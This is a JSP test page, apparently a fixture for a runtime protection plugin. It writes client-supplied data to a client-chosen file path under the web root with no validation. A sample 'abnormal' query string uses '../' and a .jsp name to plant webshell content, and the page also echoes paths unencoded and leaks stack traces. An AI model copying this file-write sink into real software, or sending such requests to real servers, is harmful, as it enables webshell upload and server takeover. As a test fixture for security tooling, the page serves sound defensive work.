005-file-write.jsp
<%@page import="java.io.*" %>
<%@page contentType="text/html; charset=UTF-8" %>
<html>
<head>
<meta charset="UTF-8"/>
<title>005 任意文件写入</title>
</head>
<body>
<%
// Test page for an arbitrary-file-write sink: the "filedata" request parameter is
// written to a file whose name is taken from the "filename" request parameter,
// under the web application root. Both values reach the sink without validation.
// NOTE(review): this looks like an intentionally vulnerable fixture for exercising a
// runtime protection plugin (see the notice text below); it should only be deployed
// on an isolated test host.

// Sample query strings, used only to render the two links at the bottom of the page.
// The first names a plain file; the second contains a "../" segment and a .jsp
// extension, i.e. the input shape a filename check would be expected to reject.
String normal_querystring = "?filename=123.txt&filedata=some-report-data";
String linux_querystring = "?filename=reports/../123.jsp&filedata=some-webshell-data";
// Client-controlled content and file name, read straight from the request.
String bytes = request.getParameter("filedata");
String fname = request.getParameter("filename");
// With either parameter missing nothing is written; only the notice below is shown.
if (fname == null || bytes == null) {
// The notice says (in Chinese): because of possible false positives, the official
// plugin does not currently block this kind of backdoor that writes files through
// FileOutputStream, and this will be addressed as soon as possible.
%>
<p>注意: 由于可能产生误报,所以目前官方插件不会拦截这种使用 FileOutputStream 写文件的后门,我们会尽快解决</p>
<%
}
else {
try {
String path;
// Choose the base directory: on WebLogic the path of the "/" resource URL is used,
// on every other server the real path of "/".
// NOTE(review): presumably because getRealPath("/") is not usable on WebLogic for
// this deployment type — confirm.
String serverInfo = application.getServerInfo();
if (serverInfo != null && serverInfo.toLowerCase().contains("weblogic")) {
path = application.getResource("/").getPath() + "/" + fname;
} else {
path = application.getRealPath("/") + "/" + fname;
}
// fname is appended as-is: the path is never normalized, never checked to stay
// under the base directory, and the extension is not restricted. A production
// handler would resolve against a fixed directory outside the web root, normalize,
// verify the result still starts with that directory, and allow-list extensions.
// new FileOutputStream(path) truncates a file that already exists at that path.
FileOutputStream os = new FileOutputStream(path);
// PrintWriter(OutputStream) encodes with the platform default charset, and
// PrintWriter records write failures in an error flag instead of throwing;
// checkError() is never called here, so a failed write is not reported.
PrintWriter writer = new PrintWriter(os);
writer.print(bytes);
// Closing the writer also closes os. There is no finally/try-with-resources, so an
// exception between the constructor and this line would leave the stream open.
writer.close();
// The resulting path, which contains the client-supplied fname, is echoed into the
// HTML response without encoding.
out.println("==>" + path);
} catch (Exception e) {
// The full stack trace is sent to the client, which discloses server-side paths and
// class names. It is written through response.getWriter() rather than the buffered
// JSP "out", so it may not appear between the <pre> tags — TODO confirm ordering.
out.print("<pre>");
e.printStackTrace(response.getWriter());
out.print("</pre>");
}
}
%>
<p>正常调用</p>
<p>curl '<a href="<%=request.getRequestURL()+normal_querystring%>" target="_blank"><%=request.getRequestURL()+normal_querystring%></a>'</p>
<p>不正常调用</p>
<p>curl '<a href="<%=request.getRequestURL()+linux_querystring%>" target="_blank"><%=request.getRequestURL()+linux_querystring%></a>'</p>
</body>
</html>